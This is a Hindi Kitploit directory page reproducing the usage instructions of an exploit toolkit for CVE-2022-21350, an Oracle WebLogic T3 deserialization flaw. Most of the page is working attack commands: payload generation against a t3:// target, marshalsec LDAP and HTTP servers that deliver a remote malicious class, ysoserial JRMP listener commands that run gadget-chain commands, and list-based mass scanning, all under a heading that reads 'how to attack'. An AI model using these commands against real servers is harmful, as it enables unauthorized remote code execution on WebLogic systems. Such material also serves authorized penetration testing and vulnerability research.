Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-21350 — CVE-2022-21350 के लिए एक्सप्लॉइट टूलकिट जो Oracle WebLogic T3 प्रोटोकॉल को लक्षित करता है, जिसमें पेलोड जनरेशन, LDAP/HTTP सर्वर, और कई JDK संस्करणों का समर्थन शामिल है। | Kitploit
उपकरण/GitHubGitHub/hktalent/cve-2022-21350
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubhktalent/cve-2022-21350

CVE-2022-21350

CVE-2022-21350 के लिए एक्सप्लॉइट टूलकिट जो Oracle WebLogic T3 प्रोटोकॉल को लक्षित करता है, जिसमें पेलोड जनरेशन, LDAP/HTTP सर्वर, और कई JDK संस्करणों का समर्थन शामिल है।

रिपॉजिटरी देखें
332 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

दो poc क्यों
एक साथ
com._51pwn.hktalent.CreatJar.main(args);
न्यूनतम पेलोड जनरेट करने वाले टूल को बनाते समय उपयोग किया जाता है
बनाने के बाद दूसरे का उपयोग करें

CVE-2022-21350_powerBy_51pwn.jar चलाने पर पेलोड बनाने में त्रुटि आती है, लेकिन इससे पेलोड के उपयोग पर कोई प्रभाव नहीं पड़ता

अन्य एक्सपी

root@kitploit:~
CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

उपयोग कैसे करें

1- पेलोड जनरेट करें

root@kitploit:~
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- LDAP सर्वर शुरू करें

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- HTTP सर्वर शुरू करें, क्लास फ़ाइल भेजने के लिए

root@kitploit:~
node httpServer.js

4- पेलोड भेजें

root@kitploit:~
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# अधिक
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s  

java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

पेलोड कहाँ है

root@kitploit:~
cat test.ser

त्रुटि संदेश क्यों आता है

चलाने पर त्रुटि आती है लेकिन इससे पेलोड के निर्माण और प्रभाव पर कोई असर नहीं पड़ता
चलाने पर त्रुटि आने से पेलोड के निर्माण और प्रभाव पर कोई असर नहीं पड़ता

हमला कैसे करें

root@kitploit:~
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

समर्थित उपकरण:

  • 1- वेबलॉजिक संस्करण
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2- JDK < 1.8
  • 3- सर्वर OOB की अनुमति देता है

जार कैसे बनाएं और मर्ज करें

root@kitploit:~
cd lib3
# विभाजित करें
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# मर्ज करें
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

विशेष धन्यवाद

  • <a href=https://github.com/lz520520>@lz520520
  • <a href=https://github.com/Y4er>@Y4er
टूल डाउनलोड करें